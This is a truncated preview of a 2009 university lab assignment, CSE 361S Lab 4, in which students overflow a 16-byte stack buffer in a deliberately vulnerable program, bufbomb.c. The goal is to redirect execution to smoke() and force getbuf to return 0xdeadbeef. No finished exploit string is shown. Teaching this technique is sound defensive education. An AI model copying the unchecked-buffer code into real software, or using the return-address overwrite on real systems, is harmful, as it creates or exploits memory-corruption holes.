lab4 - CSE 361S Intro to Systems Software Lab Assignment#4...

Info iconThis preview shows pages 1–3. Sign up to view the full content.

View Full Document Right Arrow Icon
1 CSE 361S Intro to Systems Software Lab Assignment #4 Due: Thursday, October 29, 2009. In this lab, you will mount a buffer overflow attack on your own program. We do not condone using this or any other form of attack to gain unauthorized access to a system. Rather, by doing this exercise, I hope you will learn a lot about how to defend against such attacks. You may work in a group of up to two people in solving the problems in this lab. Download the file bufbomb.c from the class web site and compile it to create an executable program. In bufbomb.c you will find the following functions: int getbuf() { char buf[16]; getxs(buf); return 1; } void test() { int val; printf(“Type Hex String: ”); val = getbuf(); printf(“getbuf returned 0x%x\n”, val); } The function getxs (also in bufbomb.c ) is similar to the library gets , except that it reads characters encoded as pairs of hex digits. For example, to give it a string “ 0123 ,” the user would type in the string “ 30 31 32 33 .” The function ignores blank characters. Recall that decimal digit x has ASCII representation 0x3 x . A typical execution of the program is as follows: prompt> ./bufbomb Type Hex String: 30 31 32 33 getbuf returned 0x1 Looking at the code for the getbuf function, it seems quite apparent that it will return value 1 whenever it is called. It appears as if the call to getxs has no effect. Your task is to make getbuf return 0xdeadbeef to test , simply by typing an appropriate hexadecimal string to the prompt.
Background image of page 1

Info iconThis preview has intentionally blurred sections. Sign up to view the full version.

View Full DocumentRight Arrow Icon
2 You will get there in several stages. Stage 1 If the string typed by the user to getbuf is no more than 15 characters long, it is clear that getbuf will return 1. Typically an error occurs if we type a longer string: prompt> ./bufbomb Type Hex String: 30 31 32 33 30 31 32 33 30 31 32 33 30 31 Ouch!: You caused a segmentation fault! Better luck next time As the error indicates, overrunning the buffer typically causes the program state to be corrupted, leading to a memory access error. Your task is to be more clever with the strings you feed bufbomb so that it does more interesting things. When getbuf executes its return statement, the program ordinarily resumes execution within function test . In the file bufbomb.c , there is a function smoke having the following C code: void smoke() { printf(“Smoke: You called smoke()\n”); exit(0); } Your task is to get bufbomb to execute the code for smoke when getbuf executes its ret instruction, rather than returning to test . You can do this by supplying an exploit string that overwrites the stored return pointer in the stack frame for getbuf with the address of the first instruction in smoke . Note that your exploit string may also corrupt other parts of the stack state, but this will not cause a problem, since smoke causes the program to exit directly. Helpful hints:
Background image of page 2
Image of page 3
This is the end of the preview. Sign up to access the rest of the document.

This document was uploaded on 11/13/2009.

Page1 / 7

lab4 - CSE 361S Intro to Systems Software Lab Assignment#4...

This preview shows document pages 1 - 3. Sign up to view the full document.

View Full Document Right Arrow Icon
Ask a homework question - tutors are online